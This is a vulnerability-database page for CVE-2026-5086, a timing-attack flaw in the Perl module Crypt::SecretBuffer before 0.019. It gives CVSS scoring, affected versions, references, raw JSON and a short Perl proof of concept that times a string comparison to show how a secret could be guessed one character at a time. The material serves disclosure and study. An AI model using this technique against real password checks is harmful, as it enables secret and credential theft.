Security Vulnerability Report
CVE-2026-5086 CVSS 7.5 HIGH

CVE-2026-5086

Published: 2026-04-13 23:16:28
Last Modified: 2026-05-06 17:16:50
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Crypt::SecretBuffer versions before 0.019 for Perl are susceptible to timing attacks. For example, if Crypt::SecretBuffer was used to store and compare plaintext passwords, then discrepancies in timing could be used to guess the secret password.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nerdvana:crypt\:\:secretbuffer:*:*:*:*:*:perl:*:* - VULNERABLE
Crypt::SecretBuffer < 0.019

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
perl
#!/usr/bin/perl
use strict;
use warnings;
use Time::HiRes qw(time);

# Simulate the vulnerable comparison in Crypt::SecretBuffer < 0.019
sub vulnerable_compare {
    my ($secret, $input) = @_;
    # Vulnerability: a standard string comparison returns as soon as a
    # mismatch is found, so its run time depends on how much of the
    # input matches the secret (CWE-208, observable timing discrepancy)
    return $secret eq $input;
}

my $secret_buffer = "sensitive_secret_key_123";
my @test_inputs = (
    "a",                      # wrong first char
    "s",                      # correct first char
    "se",                     # correct first two chars
    "wrong_guess_xxxxxxxxx",  # completely wrong
);

print "Measuring timing differences (microseconds):\n";
foreach my $input (@test_inputs) {
    my $start = time();
    vulnerable_compare($secret_buffer, $input);
    my $elapsed = (time() - $start) * 1_000_000;
    printf "Input: %-25s Time: %.4f us\n", $input, $elapsed;
}

# Analysis:
# If 's' takes longer than 'a', and 'se' takes longer than 's',
# an attacker can confirm correct characters sequentially.

References

https://metacpan.org/release/NERDVANA/Crypt-SecretBuffer-0.019/source/Changes (Product, Release Notes)
http://www.openwall.com/lists/oss-security/2026/04/13/12 (Third Party Advisory, Mailing List)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5086", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-04-13T23:16:27.990", "lastModified": "2026-05-06T17:16:49.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Crypt::SecretBuffer versions before 0.019 for Perl is suseceptible to timing attacks.\n\nFor example, if Crypt::SecretBuffer was used to store and compare plaintext passwords, then discrepencies in timing could be used to guess the secret password."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nerdvana:crypt\\:\\:secretbuffer:*:*:*:*:*:perl:*:*", "versionEndExcluding": "0.019", "matchCriteriaId": "93A2172E-D859-484C-BF39-687B58BCC991"}]}]}], "references": [{"url": "https://metacpan.org/release/NERDVANA/Crypt-SecretBuffer-0.019/source/Changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product", "Release Notes"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/13/12", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory", "Mailing List"]}]}}